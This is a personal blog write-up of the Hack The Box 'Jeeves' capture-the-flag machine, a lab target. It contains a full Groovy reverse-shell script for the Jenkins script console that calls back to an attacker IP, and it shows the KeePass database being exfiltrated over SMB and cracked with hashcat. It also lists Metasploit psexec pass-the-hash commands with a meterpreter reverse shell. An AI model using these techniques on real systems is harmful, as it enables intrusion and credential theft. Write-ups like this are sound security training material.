HTB – Jeeves

Posted by

I really enjoyed the Jeeves box.  I learned more on this box in the week I spent working on it than I have on multiple others, and it was my very first Windows CTF (which I was previously quite intimidated by but I enjoyed the challenge immensely.

  • First, I run my usual NMAP scan.
    NMAP –T4 –A –v 10.10.10.63: reveals 4 open ports. Two of them are HTTP (80 and 50000).  I take a look at both, and enumerate each one separately.
  • Dirbuster/GoBuster: on both open ports; gobuster with an exceptionally long wordlist was able to find the /askjeeves directory on port 50000. That’s a start.
  • 10.10.10.63:50000/askjeeves gets you into some kind of backend console.
  • I poked around a little and found a script console (Manage Jenkins > Script Console) there using Apache Groovy. I did some searching on the language and the interface, and found a script developed by frohoff that would throw a cmd.exe shell (https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) :
    String host=”10.10.14.13″;
    int port=8044;
    String cmd=”cmd.exe”;
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
  • Started netcat listener: nc –lvp 8044
    Executed script in console, got shell.
    whoami: jeeves/kohsuke
    dir user.txt /s /p
    User.txt is on the Desktop.
    more user.txt to get hash.

Now, we move on to root:

Dir gives a list of files in the current C:\Users\Administrator\.jenkins file.  Of interest may be the secret.key and secret.key.not-so-secret.   If we more secret.key, we get something that looks like a hash.  If we more secret.key.not-so-secret, we don’t. Also in this file is a directory called “secrets”, which contains multiple files of interest.

C:\Users\Administrator\.jenkins\secrets\:

InitialAdminPassword: ccd3bc435b3c4f80bea8acca28aec491

This actually gets you into the admin console on the web interface.

So, while I can’t catch a Powershell, I can execute commands in Powershell, and could potentially write a .ps1 script that I could execute to filter out common files and look for things that are unique.  It’s not perfect yet, and it’s one I’m still working on now, but I’ll post it eventually.

C:\Users\Administrator\.jenkins>powershell /?

powershell /?

C:\Users\Administrator\.jenkins>powershell -command “$a=’hello’;$a”
powershell -command “$a=’hello’;$a”
hello

Sweet. Powershell works.  Used powershell to check directories for nonstandard files.  I basically created a list of common windows file types to exclude, and had Powershell run a search listing only those files not meeting my”normal” things.  In reality, that was far too complicated.  It was in the user’s documents folder; a .kdbx file. I researched that extension and found out it was a keepass database file – that could be very useful.  I needed to get it from the Windows box back to my Kali box for further enumeration and cracking, though.

  • Set up a samba share if you don’t already have one for this purpose.
    • Apt-get install samba
    • Cd /etc/samba
    • Rm smb.conf
    • Touch smb.conf
    • Nano smb.conf
      • [files]
        Path = /root/files
        Browseable = yes
        Read only = no
      • Ctrx+x, then y, then enter
    • Add user:
      Smbpasswd -a root
      (will prompt for password)
  • Start smbd and nmbd:
    Service smbd start
    Service nmbd start
  • Robocopy the .kdbx file to the samba share
    Map drive: Net use z: \\10.10.14.13\files /user:root PASSWORD
    Robocopy C:\users\kohsuke\documents z:\
  • Used keepass2john/johntheripper to rip the hash.  I found a great walkthrough on this here: www.rubydevices.com.au/blog/how-to-hack-keepass 
  • Copy the hash into the src folder
    Run: keepass2john CEH.kdbx > CEH.hash
    Edit the hash file and remove the CEH at the top.
  • Run: Hashcat -m 13400 -a 0 -w 1 CEH.hash rockyou.txt
    Inkedhashcat_LI
  • Great, I got a password.  I use that to open the keepass database, and I see a goldmine of credentials.
    kdbx contents
  • There are a lot of passwords in there. What stood out was the complex double-hash that was “backup stuff”
  • I went back and looked at what was open from my initial scans. SMB was open. I’m not nearly good enough to do this without metasploit, but I knew I could pass the hash using an exploit and get back a reverse tcp payload.msf > use exploit/windows/smb/psexec
    msf exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(windows/smb/psexec) > set rhost 10.10.10.63
    rhost => 10.10.10.63
    msf exploit(windows/smb/psexec) > set SMBUser administrator
    SMBUser => administrator
    msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
    SMBPass => aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
    msf exploit(windows/smb/psexec) > set lhost 10.10.14.13
    lhost => 10.10.14.13
    msf exploit(windows/smb/psexec) > exploit
  • Then…Get system
    shell
    Cd C:\users\administrator\desktop
  • Huh… no root.txt…. there’s a text file here though.
    More hm.txt yields: “The flag is elsewhere. Look deeper.”
  • You’ve got to be kidding me… ugh.  This box was testing my patience, as just about every time I thought I was done, I wasn’t.  After searching for ways to hide windows files, and knowing it has to be on the desktop per HTB rules (which I guess takes some of the fun out of looking), look for Alternate Data Streams.  This is a thing I’ll keep in my back pocket on Windows boxes going forward as a “don’t forget to enumerate for ADS files”
  • Dir /r
    There it is.
    more < hm.txt:root.txt prints me the contents.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s